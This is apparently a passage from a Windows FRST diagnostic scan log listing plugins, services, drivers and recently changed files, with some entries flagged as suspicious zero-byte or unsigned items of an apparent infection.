FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-08-04] (Adobe Inc. -> )
FF Plugin-x32: @itools.hk/npiTools, version=1.0.0 -> C:\Program Files (x86)\ThinkSky\iTools 3\Extensions\npiTools.dll [2017-05-26] (Shenzhen Thinksky Technology Co.,Ltd -> )
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2019-11-13] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2018-05-22] (NVIDIA Corporation -> NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.34.11\npGoogleUpdate3.dll [2019-05-15] (Google Inc -> Google LLC)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-10-25] (Adobe Systems Incorporated -> Adobe Systems)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/thinkorswim -> C:\Program Files\thinkorswim\npthinkorswim.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)
FF Plugin HKU\S-1-5-21-3967059023-4107875624-2872843465-1001: tdameritrade.com/tossc -> C:\Program Files\thinkorswim\nptossc.dll [2019-08-29] (TD Ameritrade -> TD Ameritrade)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeUpdateService; C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe [744640 2016-10-25] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
R2 AGMService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGMService.exe [3147344 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 AGSService; C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe [2914896 2019-10-08] (Adobe Inc. -> Adobe Systems, Incorporated)
R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [85304 2018-10-16] (Apple Inc. -> Apple Inc.)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [11341584 2019-11-18] (Microsoft Corporation -> Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2018-01-03] (Dropbox, Inc -> Dropbox, Inc.)
R2 DbxSvc; C:\Windows\system32\DbxSvc.exe [51024 2019-11-14] (Dropbox, Inc -> Dropbox, Inc.)
U2 EPSON_PM_RPCV4_06; C:\Program Files\Common Files\EPSON\EPW!3 SSRP\E_S60RPB.EXE [152640 2013-04-15] (SEIKO EPSON Corporation -> SEIKO EPSON CORPORATION)
R2 FolderSize; C:\Program Files\FolderSize\FolderSizeSvc.exe [163840 2013-02-12] (Brio) [File not signed]
S2 Foundry FLEXlm Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\FLEXlm\lmgrd.foundry.exe [1392016 2012-10-30] (Acresso Software Inc. -> Acresso Software Inc.)
R2 Foundry License Server; C:\Program Files (x86)\The Foundry\\LicensingTools7.0\bin\RLM\rlm.foundry.exe [1474560 2017-06-15] (Reprise Software Inc.) [File not signed]
R2 InputMapper Cerberus Whitelister; C:\Program Files (x86)\DSDCS\InputMapper HidGuardian\InputMapperCerberusWhitelister.exe [14848 2017-04-21] () [File not signed]
R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-29] (Microsoft Corporation -> Microsoft Corporation)
S2 MBAMInstallerService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe [5217992 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
S3 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\mbamservice.exe [6960640 2019-11-24] (Malwarebytes Inc -> Malwarebytes)
R2 NvContainerLocalSystem; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvContainerNetworkService; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [782136 2019-02-27] (NVIDIA Corporation -> NVIDIA Corporation)
R2 SbieSvc; C:\Program Files\Sandboxie\SbieSvc.exe [328344 2019-04-22] (Invincea, Inc. -> Sandboxie Holdings, LLC)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [4737448 2018-07-15] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [11446104 2019-04-24] (TeamViewer GmbH -> TeamViewer GmbH)
S3 VSStandardCollectorService150; C:\Program Files (x86)\Microsoft Visual Studio\Shared\Common\DiagnosticsHub.Collection.Service\StandardCollector.Service.exe [157480 2018-08-02] (Microsoft Corporation -> Microsoft Corporation)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\NisSrv.exe [3201616 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinAutomation Machine Agent; C:\Program Files\WinAutomation\WinAutomation.MachineAgent.exe [274496 2016-09-20] (Softomotive Ltd -> Softomotive)
S3 WinAutomation Service; C:\Program Files\WinAutomation\WinAutomation.Server.exe [885312 2016-09-20] (Softomotive Ltd -> Softomotive)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.1910.4-0\MsMpEng.exe [103168 2019-10-29] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefender; C:\WINDOWS\windefender.exe [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
S2 IBG_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibguard.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
S3 IBS_gds_db; D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7\bin\ibserver.exe -i "D:\Program Files (x86)\Embarcadero\Studio\19.0\InterBaseXE7" -p gds_db
R2 NVDisplay.ContainerLocalSystem; "C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe" -s NVDisplay.ContainerLocalSystem -f "C:\ProgramData\NVIDIA\NVDisplay.ContainerLocalSystem.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\Display.NvContainer\plugins\LocalSystem" -r -p 30000
R2 NvTelemetryContainer; "C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files\NVIDIA Corporation\NvTelemetry\plugins" -r
R2 PaceLicenseDServices; "C:\Program Files (x86)\Common Files\PACE\Services\LicenseServices\LDSvc.exe" -u https://activation.p...tiateActivation[X]

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 HidGuardian; C:\Windows\System32\drivers\HidGuardian.sys [26736 2017-04-17] (Microsoft Windows Hardware Compatibility Publisher -> Benjamin Höglinger-Stelzer)
S3 hitmanpro37; C:\WINDOWS\system32\drivers\hitmanpro37.sys [55232 2018-02-11] (SurfRight B.V. -> )
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2017-05-26] (Martin Malik - REALiX -> REALiX™)
R3 L1C; C:\Windows\System32\drivers\L1C63x64.sys [121344 2018-04-12] (Microsoft Windows -> Qualcomm Atheros Co., Ltd.)
S3 LGJoyXlCore; C:\Windows\system32\drivers\LGJoyXlCore.sys [67736 2017-10-20] (Logitech Inc -> Logitech Inc.)
S0 MbamElam; C:\Windows\System32\DRIVERS\MbamElam.sys [20936 2019-11-24] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 nvlddmkm; C:\Windows\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_f32bf428bbff8aa5\nvlddmkm.sys [17194584 2018-05-23] (NVIDIA Corporation -> NVIDIA Corporation)
S3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [30336 2019-05-10] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\system32\drivers\nvvad64v.sys [69840 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
R3 nvvhci; C:\Windows\System32\drivers\nvvhci.sys [75600 2019-04-17] (NVIDIA Corporation -> NVIDIA Corporation)
S3 ptun0901; C:\Windows\System32\drivers\ptun0901.sys [27136 2014-08-08] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
R0 pwdrvio; C:\Windows\System32\pwdrvio.sys [19152 2013-09-30] (MiniTool Solution Ltd -> )
S3 pwdspio; C:\WINDOWS\system32\pwdspio.sys [12504 2013-09-30] (MiniTool Solution Ltd -> )
R3 SbieDrv; C:\Program Files\Sandboxie\SbieDrv.sys [228616 2019-04-23] (Invincea, Inc. -> Sandboxie Holdings, LLC)
R3 ScpVBus; C:\Windows\System32\drivers\ScpVBus.sys [39168 2013-05-19] (Bruce James -> Scarlet.Crush Productions)
R3 teVirtualMIDI64; C:\Windows\system32\DRIVERS\teVirtualMIDI64.sys [41016 2015-07-12] (Tobias Erichsen -> Tobias Erichsen)
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [54784 2016-12-21] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
R1 veracrypt; C:\Windows\System32\drivers\veracrypt.sys [631200 2018-01-16] (IDRIX -> IDRIX)
S0 WdBoot; C:\Windows\System32\drivers\wd\WdBoot.sys [46472 2019-10-29] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\wd\WdFilter.sys [351968 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\drivers\wd\WdNisDrv.sys [53984 2019-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 Winmon; C:\WINDOWS\System32\drivers\Winmon.sys [0 0000-00-00] () <==== ATTENTION (zero byte File/Folder)
R3 WinmonFS; C:\WINDOWS\System32\drivers\WinmonFS.sys [0 0000-00-00] (Windows ® Win 7 DDK provider) <==== ATTENTION (zero byte File/Folder)
R1 WinmonProcessMonitor; C:\WINDOWS\System32\drivers\WinmonProcessMonitor.sys [36096 2019-11-24] (WDKTestCert Admin,131666266076831434 -> ) [File not signed]
R1 ZAM_Guard; C:\Windows\System32\drivers\zamguard64.sys [203680 2017-06-03] (Zemana Ltd. -> Zemana Ltd.)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-11-24 19:50 - 000000000 ____D C:\FRST
2019-11-24 19:17 - 2019-11-24 19:17 - 000000000 ____D C:\Users\SR\AppData\Roaming\EpicNet Inc
2019-11-24 18:57 - 2019-11-24 19:12 - 000003258 _____ C:\Windows\system32\Tasks\csrss
2019-11-24 18:57 - 2019-11-24 19:09 - 000000000 ____D C:\Program Files (x86)\Multitimer
2019-11-24 18:57 - 2019-11-24 19:07 - 000000000 ____D C:\Program Files (x86)\Hadadn
2019-11-24 18:57 - 2019-11-24 18:57 - 009089848 _____ (Microsoft Corporation) C:\Windows\system32\ntkrnlmp.exe
2019-11-24 18:57 - 2019-11-24 18:57 - 001456720 _____ (Microsoft Corporation) C:\Windows\system32\osloader.efi
2019-11-24 18:57 - 2019-11-24 18:57 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-11-24 18:57 - 2019-11-24 18:57 - 000003572 _____ C:\Windows\system32\Tasks\ScheduledUpdate
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Roaming\Microleaves
2019-11-24 18:57 - 2019-11-24 18:57 - 000000000 ____D C:\Users\SR\AppData\Local\AdvinstAnalytics
2019-11-24 00:05 - 2019-11-24 00:05 - 000000000 ____D C:\Users\SR\Documents\Joshua Bell Violin
2019-11-23 23:48 - 2019-11-24 00:35 - 000011305 _____ C:\Users\SR\Desktop\Named Notes for various VIs.xlsx
2019-11-23 22:00 - 2019-11-24 18:58 - 000009127 _____ C:\Users\SR\Desktop\New Microsoft Excel Worksheet.xlsx
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Users\SR\AppData\Roaming\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Exponential Audio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\ExponentialAudio
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\ProgramData\AudioUTOPiA
2019-11-23 18:11 - 2019-11-23 18:11 - 000000000 ____D C:\Program Files\Common Files\vst3
2019-11-19 23:08 - 2019-11-19 23:09 - 000000000 ____D C:\Users\SR\Desktop\New folder
2019-11-19 21:06 - 2019-11-19 18:40 - 000514360 _____ C:\Users\SR\Desktop\Spitfire Solo Cello.nicnt
2019-11-19 18:32 - 2019-11-19 18:32 - 000000040 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkc
2019-11-19 17:50 - 2019-11-19 17:50 - 000000000 _____ C:\Users\SR\Desktop\Spitfire Solo Cello_info.nkx
2019-11-18 13:04 - 2019-11-18 13:04 - 000001289 _____ C:\Users\SR\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FolderSize.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\Users\Public\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000001090 _____ C:\ProgramData\Desktop\Kontakt 5.lnk
2019-11-17 22:53 - 2019-11-17 22:53 - 000000000 __HDC C:\ProgramData\{06D838A8-9544-4D7D-808F-4ED187621BBB}
2019-11-17 22:49 - 2019-11-17 23:42 - 000000000 ____D C:\Users\SR\Desktop\old Native Instruments folder
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\Users\Public\Documents\NI Resources
2019-11-17 21:04 - 2019-11-17 21:04 - 000000000 ____D C:\ProgramData\Documents\NI Resources
2019-11-16 00:54 - 2019-11-16 00:54 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2019-11-14 14:19 - 2019-11-14 14:19 - 000051024 _____ (Dropbox, Inc.) C:\Windows\system32\DbxSvc.exe
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-stable.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-dev.sys
2019-11-14 14:19 - 2019-11-14 14:19 - 000047600 _____ (Dropbox, Inc.) C:\Windows\system32\Drivers\dbx-canary.sys
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\AppData\Roaming\Subversion
2019-11-11 14:05 - 2019-11-11 14:05 - 000000000 ____D C:\Users\SR\.android
2019-11-11 14:04 - 2019-11-11 14:04 - 000000000 ____D C:\Users\SR\Documents\Embarcadero
2019-11-11 13:49 - 2019-11-11 13:49 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Embarcadero InterBase XE7
2019-11-11 13:49 - 2016-02-25 19:35 - 001287496 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\gds32.dll
2019-11-11 13:49 - 2016-02-25 19:35 - 000031560 _____ (Embarcadero Technologies, Inc.) C:\Windows\SysWOW64\ibxml.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 001766728 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibclient64.dll
2019-11-11 13:49 - 2016-02-25 18:57 - 000034632 _____ (Embarcadero Technologies, Inc.) C:\Windows\system32\ibxml64.dll
2019-11-11 13:48 - 2019-11-11 13:48 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java Development Kit
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\Users\Public\Documents\Embarcadero
2019-11-11 13:23 - 2019-11-11 13:36 - 000000000 ____D C:\ProgramData\Documents\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\Users\SR\AppData\Roaming\Embarcadero
2019-11-11 00:59 - 2019-11-11 14:22 - 000000000 ____D C:\ProgramData\Embarcadero
2019-11-11 00:57 - 2019-11-11 00:57 - 000000000 ____D C:\Users\SR\AppData\Local\PackageAware
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\wxWidgets-3.0.4
2019-11-10 23:04 - 2019-11-10 23:04 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\wxWidgets 3.0.4
2019-11-10 22:32 - 2019-11-10 23:12 - 000000000 ____D C:\Users\SR\Documents\srCodeBlock
2019-11-10 22:27 - 2019-11-11 14:28 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeBlocks
2019-11-10 22:27 - 2019-11-10 23:18 - 000000000 ____D C:\Users\SR\AppData\Roaming\CodeBlocks
2019-11-10 20:56 - 2019-11-10 20:56 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2017 Tools for Unity
2019-11-10 20:55 - 2019-11-10 20:55 - 000000000 ____D C:\Program Files (x86)\Windows Phone Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Windows App Certification Kit
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files\Application Verifier
2019-11-10 20:46 - 2019-11-10 20:46 - 000000000 ____D C:\Program Files (x86)\Application Verifier
2019-11-10 20:40 - 2018-04-11 06:46 - 000402944 _____ (Windows ® Win 7 DDK provider) C:\Windows\system32\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 06:44 - 000350208 _____ (Microsoft Corporation) C:\Windows\system32\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-11 05:12 - 000380416 _____ (Windows ® Win 7 DDK provider) C:\Windows\SysWOW64\DXCpl.exe
2019-11-10 20:40 - 2018-04-11 05:11 - 000271360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\perf_gputiming.dll
2019-11-10 20:40 - 2018-04-10 21:41 - 000095744 _____ (Microsoft Corporation) C:\Windows\system32\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:37 - 000095744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DxToolsReportGenerator.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 017871360 _____ (Microsoft Corporation) C:\Windows\system32\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:15 - 014058496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCaptureReplay.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:11 - 000041984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000142336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:10 - 000118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000238592 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:09 - 000091136 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsProxyStub.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 004529664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 003632640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:08 - 002249728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 001100288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000466944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000334848 _____ (Microsoft Corporation) C:\Windows\system32\DXGIDebug.dll
2019-11-10 20:40 - 2018-04-10 21:08 - 000078848 _____ (Microsoft Corporation) C:\Windows\system32\VSD3DWARPDebug.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 001359872 _____ (Microsoft Corporation) C:\Windows\system32\d3d11_3SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000221184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsExperiment.dll
2019-11-10 20:40 - 2018-04-10 21:07 - 000176128 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsReporting.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 004858880 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsRemoteEngine.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 001500160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000921088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:06 - 000539136 _____ (Microsoft Corporation) C:\Windows\system32\d2d1debug3.dll
2019-11-10 20:40 - 2018-04-10 21:06 - 000124928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 005746688 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsDesktopEngine.exe
2019-11-10 20:40 - 2018-04-10 21:05 - 002000896 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsOfflineAnalysis.dll
2019-11-10 20:40 - 2018-04-10 21:05 - 000164864 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsCapture.dll
2019-11-10 20:40 - 2018-04-10 21:04 - 000189952 _____ (Microsoft Corporation) C:\Windows\system32\DXToolsMonitor.dll
2019-11-10 20:40 - 2018-04-10 21:03 - 002818560 _____ (Microsoft Corporation) C:\Windows\system32\d3d12SDKLayers.dll
2019-11-10 20:40 - 2018-04-10 21:02 - 001178624 _____ (Microsoft Corporation) C:\Windows\system32\DXCap.exe
2019-11-10 20:40 - 2018-04-10 21:02 - 000286720 _____ (Microsoft Corporation) C:\Windows\system32\VsGraphicsExperiment.dll
2019-11-10 20:36 - 2019-11-10 20:36 - 000000000 ____D C:\Program Files (x86)\NuGet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Users\SR\.dotnet
2019-11-10 20:35 - 2019-11-10 20:35 - 000000000 ____D C:\Program Files\dotnet
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\SysWOW64\1028
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\3082
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\2052
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1055
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1049
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1046
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1045
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1042
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1041
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1040
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1036
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1033
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1031
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1029
2019-11-10 20:34 - 2019-11-10 20:39 - 000000000 ____D C:\Windows\system32\1028
2019-11-10 20:34 - 2019-11-10 20:34 - 000001843 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Blend for Visual Studio 2017.lnk
2019-11-10 20:34 - 2019-11-10 20:34 - 000000000 ____D C:\Program Files (x86)\Entity Framework Tools
2019-11-10 20:33 - 2019-11-10 20:33 - 000001499 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2017.lnk
2019-11-05 18:52 - 2019-11-05 18:52 - 000000000 ____D C:\Users\SR\AppData\Local\Viber
2019-10-28 22:34 - 2019-10-28 22:34 - 000000000 ____D C:\Users\SR\Desktop\FIFA-19---Career-Mode-Cheat-Table-master
2019-10-26 12:03 - 2019-10-26 12:03 - 000002149 _____ C:\Users\SR\Desktop\FTX GLOBAL VECTOR Configuration Tool.exe - Shortcut.lnk

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-11-24 19:50 - 2019-08-14 11:29 - 000064693 _____ C:\Windows\ZAM_Guard.krnl.trace
2019-11-24 19:38 - 2017-05-25 17:31 - 000000000 ____D C:\Users\SR\AppData\LocalLow\Mozilla
2019-11-24 19:16 - 2018-06-02 15:28 - 001464880 _____ C:\Windows\system32\PerfStringBackup.INI
2019-11-24 19:16 - 2018-06-02 13:32 - 000550540 _____ C:\Windows\system32\perfh008.dat
2019-11-24 19:16 - 2018-06-02 13:32 - 000088248 _____ C:\Windows\system32\perfc008.dat
2019-11-24 19:16 - 2018-04-12 01:36 - 000000000 ____D C:\Windows\INF
2019-11-24 19:14 - 2018-06-01 16:16 - 000000000 ____D C:\ProgramData\NVIDIA
2019-11-24 19:12 - 2018-06-06 18:07 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2019-11-24 19:12 - 2018-06-02 15:24 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-11-24 19:12 - 2018-04-12 01:38 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2019-11-24 19:12 - 2017-10-10 18:36 - 000000000 ____D C:\Users\SR\Documents\DesktopReminder
2019-11-24 19:12 - 2017-06-15 17:44 - 000000000 ____D C:\ProgramData\Reprise
2019-11-24 19:11 - 2018-04-11 23:04 - 000524288 _____ C:\Windows\system32\config\BBI
2019-11-24 19:07 - 2019-08-11 17:31 - 000153312 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbae64.sys
2019-11-24 19:07 - 2019-08-11 17:31 - 000020936 _____ (Malwarebytes) C:\Windows\system32\Drivers\MbamElam.sys
2019-11-24 18:57 - 2017-06-12 13:15 - 000011914 __RSH C:\ProgramData\ntuser.pol
2019-11-24 18:51 - 2017-05-26 16:40 - 000000000 ____D C:\Program Files\REAPER (x64)
2019-11-24 18:37 - 2017-05-26 12:04 - 000000000 ____D C:\Users\SR\AppData\Roaming\qBittorrent
